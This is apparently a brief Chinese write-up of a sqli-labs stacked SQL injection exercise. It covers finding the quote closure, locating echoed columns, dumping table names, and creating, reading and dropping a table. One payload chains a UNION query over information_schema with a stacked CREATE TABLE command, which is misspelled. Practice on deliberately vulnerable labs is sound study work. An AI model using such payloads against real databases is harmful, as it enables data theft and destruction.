sqli-labs 堆叠注入 解析

打开网页首先判断闭合类型

sqli-labs 堆叠注入 解析_第1张图片

说明为双引号闭合

 我们可以使用单引号将其报错

先尝试判断回显位

sqli-labs 堆叠注入 解析_第2张图片

 可以看见输出回显位为2,3

尝试暴库爆表

sqli-labs 堆叠注入 解析_第3张图片

这时候进行尝试堆叠注入,创造一张新表

sqli-labs 堆叠注入 解析_第4张图片

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database();creat table usdt like users --+

从新表爆字段

sqli-labs 堆叠注入 解析_第5张图片

 爆数据,顺便删表

sqli-labs 堆叠注入 解析_第6张图片

 

 

 

你可能感兴趣的:(数据库)